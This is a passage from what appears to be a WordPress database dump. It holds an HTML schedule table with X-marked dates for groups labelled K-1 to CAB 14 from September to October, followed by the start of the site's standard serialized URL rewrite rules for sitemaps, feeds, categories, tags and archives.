class=\"column-11\">&nbsp;</th><th class=\"column-12\">&nbsp;</th><th class=\"column-13\">&nbsp;</th><th class=\"column-14\">&nbsp;</th><th class=\"column-15\">&nbsp;</th><th class=\"column-16\">&nbsp;</th><th class=\"column-17\">&nbsp;</th><th class=\"column-18\">5-Sep</th><th class=\"column-19\">&nbsp;</th><th class=\"column-20\">&nbsp;</th><th class=\"column-21\">&nbsp;</th><th class=\"column-22\">&nbsp;</th><th class=\"column-23\">&nbsp;</th><th class=\"column-24\">&nbsp;</th><th class=\"column-25\">&nbsp;</th><th class=\"column-26\">12-Sep</th><th class=\"column-27\">&nbsp;</th><th class=\"column-28\">&nbsp;</th><th class=\"column-29\">&nbsp;</th><th class=\"column-30\">&nbsp;</th><th class=\"column-31\">&nbsp;</th><th class=\"column-32\">&nbsp;</th><th class=\"column-33\">&nbsp;</th><th class=\"column-34\">19-Sep</th><th class=\"column-35\">&nbsp;</th><th class=\"column-36\">&nbsp;</th><th class=\"column-37\">&nbsp;</th><th class=\"column-38\">&nbsp;</th><th class=\"column-39\">&nbsp;</th><th class=\"column-40\">&nbsp;</th><th class=\"column-41\">&nbsp;</th><th class=\"column-42\">26-Sep</th><th class=\"column-43\">&nbsp;</th><th class=\"column-44\">&nbsp;</th><th class=\"column-45\">&nbsp;</th><th class=\"column-46\">&nbsp;</th><th class=\"column-47\">&nbsp;</th><th class=\"column-48\">&nbsp;</th><th class=\"column-49\">&nbsp;</th><th class=\"column-50\">3-Oct</th><th class=\"column-51\">&nbsp;</th><th class=\"column-52\">&nbsp;</th><th class=\"column-53\">&nbsp;</th><th class=\"column-54\">&nbsp;</th><th class=\"column-55\">&nbsp;</th><th class=\"column-56\">&nbsp;</th>\n</tr>\n</thead>\n<tbody class=\"row-hover\">\n<tr class=\"row-2 even\">\n	<td class=\"column-1\"></td><td class=\"column-2\">S</td><td class=\"column-3\">S</td><td class=\"column-4\">M</td><td class=\"column-5\">T</td><td class=\"column-6\">W</td><td class=\"column-7\">TH</td><td class=\"column-8\">F</td><td class=\"column-9\"></td><td class=\"column-10\">S</td><td class=\"column-11\">S</td><td class=\"column-12\">M</td><td class=\"column-13\">T</td><td class=\"column-14\">W</td><td class=\"column-15\">TH</td><td class=\"column-16\">F</td><td class=\"column-17\"></td><td class=\"column-18\">S</td><td class=\"column-19\">S</td><td class=\"column-20\">M</td><td class=\"column-21\">T</td><td class=\"column-22\">W</td><td class=\"column-23\">TH</td><td class=\"column-24\">F</td><td class=\"column-25\"></td><td class=\"column-26\">S</td><td class=\"column-27\">S</td><td class=\"column-28\">M</td><td class=\"column-29\">T</td><td class=\"column-30\">W</td><td class=\"column-31\">TH</td><td class=\"column-32\">F</td><td class=\"column-33\"></td><td class=\"column-34\">S</td><td class=\"column-35\">S</td><td class=\"column-36\">M</td><td class=\"column-37\">T</td><td class=\"column-38\">W</td><td class=\"column-39\">TH</td><td class=\"column-40\">F</td><td class=\"column-41\"></td><td class=\"column-42\">S</td><td class=\"column-43\">S</td><td class=\"column-44\">M</td><td class=\"column-45\">T</td><td class=\"column-46\">W</td><td class=\"column-47\">TH</td><td class=\"column-48\">F</td><td class=\"column-49\"></td><td class=\"column-50\">S</td><td class=\"column-51\">S</td><td class=\"column-52\">M</td><td class=\"column-53\">T</td><td class=\"column-54\">W</td><td class=\"column-55\">TH</td><td class=\"column-56\">F</td>\n</tr>\n<tr class=\"row-3 odd\">\n	<td class=\"column-1\">K-1</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\"></td><td class=\"column-19\"></td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-4 even\">\n	<td class=\"column-1\">S-2</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\">X</td><td class=\"column-8\">X</td><td class=\"column-9\"></td><td class=\"column-10\">X</td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\"></td><td class=\"column-19\"></td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-5 odd\">\n	<td class=\"column-1\">K-3</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\">X</td><td class=\"column-17\"></td><td class=\"column-18\">X</td><td class=\"column-19\">X</td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\"></td><td class=\"column-41\"></td><td class=\"column-42\"></td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-6 even\">\n	<td class=\"column-1\">S-4</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\"></td><td class=\"column-19\"></td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\"></td><td class=\"column-41\"></td><td class=\"column-42\"></td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-7 odd\">\n	<td class=\"column-1\">K-5</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\">X</td><td class=\"column-9\"></td><td class=\"column-10\">X</td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\"></td><td class=\"column-19\"></td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\"></td><td class=\"column-41\"></td><td class=\"column-42\"></td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-8 even\">\n	<td class=\"column-1\">S-6</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\">X</td><td class=\"column-11\">X</td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\"></td><td class=\"column-19\"></td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\">X</td><td class=\"column-49\"></td><td class=\"column-50\">X</td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-9 odd\">\n	<td class=\"column-1\">K-7</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\">X</td><td class=\"column-17\"></td><td class=\"column-18\">X</td><td class=\"column-19\">X</td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-10 even\">\n	<td class=\"column-1\">V-9</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\"></td><td class=\"column-19\"></td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\">X</td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\">X</td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-11 odd\">\n	<td class=\"column-1\">CAB 10</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\"></td><td class=\"column-19\"></td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\">X</td><td class=\"column-48\">X</td><td class=\"column-49\"></td><td class=\"column-50\">X</td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-12 even\">\n	<td class=\"column-1\">CAB 11</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\">X</td><td class=\"column-19\">X</td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-13 odd\">\n	<td class=\"column-1\">CAB 12</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\"></td><td class=\"column-19\"></td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\">X</td><td class=\"column-49\"></td><td class=\"column-50\">X</td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-14 even\">\n	<td class=\"column-1\">CAB 13</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\">X</td><td class=\"column-17\"></td><td class=\"column-18\">X</td><td class=\"column-19\">X</td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\">X</td><td class=\"column-29\">X</td><td class=\"column-30\">X</td><td class=\"column-31\">X</td><td class=\"column-32\">X</td><td class=\"column-33\"></td><td class=\"column-34\">X</td><td class=\"column-35\">X</td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\"></td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n<tr class=\"row-15 odd\">\n	<td class=\"column-1\">CAB 14</td><td class=\"column-2\"></td><td class=\"column-3\"></td><td class=\"column-4\"></td><td class=\"column-5\"></td><td class=\"column-6\"></td><td class=\"column-7\"></td><td class=\"column-8\"></td><td class=\"column-9\"></td><td class=\"column-10\"></td><td class=\"column-11\"></td><td class=\"column-12\"></td><td class=\"column-13\"></td><td class=\"column-14\"></td><td class=\"column-15\"></td><td class=\"column-16\"></td><td class=\"column-17\"></td><td class=\"column-18\"></td><td class=\"column-19\"></td><td class=\"column-20\"></td><td class=\"column-21\"></td><td class=\"column-22\"></td><td class=\"column-23\"></td><td class=\"column-24\"></td><td class=\"column-25\"></td><td class=\"column-26\"></td><td class=\"column-27\"></td><td class=\"column-28\"></td><td class=\"column-29\"></td><td class=\"column-30\"></td><td class=\"column-31\"></td><td class=\"column-32\"></td><td class=\"column-33\"></td><td class=\"column-34\"></td><td class=\"column-35\"></td><td class=\"column-36\"></td><td class=\"column-37\"></td><td class=\"column-38\"></td><td class=\"column-39\"></td><td class=\"column-40\">X</td><td class=\"column-41\"></td><td class=\"column-42\">X</td><td class=\"column-43\">X</td><td class=\"column-44\"></td><td class=\"column-45\"></td><td class=\"column-46\"></td><td class=\"column-47\"></td><td class=\"column-48\"></td><td class=\"column-49\"></td><td class=\"column-50\"></td><td class=\"column-51\"></td><td class=\"column-52\"></td><td class=\"column-53\"></td><td class=\"column-54\"></td><td class=\"column-55\"></td><td class=\"column-56\"></td>\n</tr>\n</tbody>\n</table>\n','no'),(62303,'rewrite_rules','a:97:{s:19:\"sitemap_index\\.xml$\";s:19:\"index.php?sitemap=1\";s:31:\"([^/]+?)-sitemap([0-9]+)?\\.xml$\";s:51:\"index.php?sitemap=$matches[1]&sitemap_n=$matches[2]\";s:24:\"([a-z]+)?-?sitemap\\.xsl$\";s:39:\"index.php?yoast-sitemap-xsl=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:38:\"index.php?&page_id=2&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.ph